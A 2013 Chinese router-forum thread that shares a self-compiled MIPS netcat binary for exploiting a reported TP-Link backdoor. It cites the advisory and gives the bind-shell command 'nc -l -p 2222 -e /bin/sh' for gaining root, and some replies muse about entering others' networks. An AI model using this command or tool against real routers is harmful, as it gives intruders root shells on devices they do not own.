找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
广告投放联系QQ68610888
查看: 69853|回复: 522

[分享] TP-Link 后门漏洞利用所需要的工具,自己编译的MIPS版的netcat

 火... [复制链接]
发表于 2013-3-19 09:21 | 显示全部楼层 |阅读模式
本帖最后由 ghostja 于 2013-3-19 18:29 编辑

首先申明:这不是一篇教程,如果需要详细方法,请见漏洞描述的具体网址。或者自己google具体相关内容。
此篇只作工具分享,节省大家编译时间。

3月12号的时候,国外的网站爆了TP-Link的后门漏洞:

具体请见: http://sekurak.pl/tp-link-httptftp-backdoor/

目测 TP-Link 使用linux系统的路由应该全线崩溃,用vxworks系统的应该暂时不受影响。
此工具在我自己的WR841N V6上测试通过。

里面只说了用nc 去连接路由的 2222端口,但在那之前需要mips版的nc工具在路由上已经执行。用此工具拿到root权限,然后该干嘛干嘛。
PS:有时候路由请求的并非“nart.out” 文件名,具体请求哪个文件名,自己开着tftp32时多注意一下就看到了。

现分享自己编译的 MIPS big endian 版本的netcat
  1. $ file nc
  2. nc: ELF 32-bit MSB executable, MIPS, MIPS-III version 1 (SYSV), statically linked, with unknown capability 0x41000000 = 0xf676e75, wit
  3. h unknown capability 0x10000 = 0x70403, stripped
复制代码
默认运行参数如下:
  1. nc -l -p 2222 -e /bin/sh
复制代码
顺便也分享一下windows版本的netcat工具

http://pan.baidu.com/share/link?shareid=331208&uk=3053741857


点评

没有教程光有程序也没用啊!!  发表于 2013-4-1 23:19
这个要先连上路由的,一般无线都加密的,如果人家关了pin,现在新的也防Pin,跑包基本不行,连不上,有一万个后门也没办法。。。。不过能连上倒是不错,楼主再出个教程吧,光有工具没教程不行。  发表于 2013-3-21 23:29

评分

参与人数 2贡献 +1 恩山币 +1 收起 理由
西门吹炭 + 1 呐,做人呢,最重要的就是开心
laoyangjp + 1 强贴留名。

查看全部评分

我的恩山、我的无线 The best wifi forum is right here.
 楼主| 发表于 2013-3-19 09:22 | 显示全部楼层
忘了说了,大家不要随便搞破坏哦。

仅供学习验证之用。
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2013-3-19 09:40 | 显示全部楼层
真的假的!太厉害了!!!
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2013-3-19 09:50 | 显示全部楼层
牛X
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2013-3-19 09:51 | 显示全部楼层
看看
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2013-3-19 10:10 | 显示全部楼层
看下,密码能更容易!
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2013-3-19 10:19 | 显示全部楼层
好教程,学习下!
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2013-3-19 10:25 | 显示全部楼层
已刷成openwrt还有影响吗?
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2013-3-19 10:25 | 显示全部楼层
了解一下什么情况
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2013-3-19 10:31 | 显示全部楼层
这有什么用呢喃  
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2013-3-19 10:36 | 显示全部楼层
这个漏洞怎么利用啊。
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2013-3-19 10:39 来自手机 | 显示全部楼层
linux的tp可以轻松破解了?
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

 楼主| 发表于 2013-3-19 10:49 | 显示全部楼层
shanboy 发表于 2013-3-19 10:25
已刷成openwrt还有影响吗?

刷成openwrt不受此漏洞影响。
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2013-3-19 10:53 | 显示全部楼层
哈哈 。。该干嘛的干嘛
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2013-3-19 11:00 | 显示全部楼层
本帖内容必须隐藏?
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

有疑问请添加管理员QQ86788181|手机版|小黑屋|Archiver|恩山无线论坛(常州市恩山计算机开发有限公司版权所有) ( 苏ICP备05084872号 )

GMT+8, 2024-3-29 00:52

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

| 江苏省互联网有害信息举报中心 举报信箱:js12377 | @jischina.com.cn 举报电话:025-88802724 本站不良内容举报信箱:68610888@qq.com 举报电话:0519-86695797

快速回复 返回顶部 返回列表